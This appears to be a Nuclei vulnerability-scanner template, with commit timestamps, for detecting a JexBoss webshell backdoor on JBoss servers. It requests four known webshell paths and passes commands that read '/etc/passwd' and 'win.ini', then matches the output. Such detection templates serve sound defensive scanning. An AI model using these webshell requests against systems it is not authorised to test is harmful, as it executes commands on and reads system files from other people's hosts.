nuclei-templates/http/vulnerabilities/backdoor/jexboss-backdoor.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2021-12-04 10:09:18 +00:00
id: jexboss-backdoor
info:
name: JexBoss - Remote Code Execution
2021-12-04 10:09:18 +00:00
author: UnkL4b
severity: critical
description: JexBoss is susceptible to remote code execution via the webshell. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2021-12-04 10:09:18 +00:00
reference:
- https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
- https://github.com/joaomatosf/jexboss
2022-07-26 06:59:48 +00:00
metadata:
max-request: 8
2022-07-26 06:59:48 +00:00
verified: true
2021-12-21 15:31:11 +00:00
tags: backdoor,jboss,rce
2021-12-04 10:09:18 +00:00
http:
2021-12-04 10:09:18 +00:00
- method: GET
path:
- "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('{{command}}')}}"
2021-12-21 15:27:06 +00:00
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
2021-12-04 10:09:18 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
2021-12-21 15:27:06 +00:00
- type: regex
2021-12-04 10:09:18 +00:00
part: body
2021-12-21 15:27:06 +00:00
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
2021-12-04 10:09:18 +00:00
- type: word
part: header
words:
2021-12-21 15:27:06 +00:00
- "X-Powered-By: Servlet"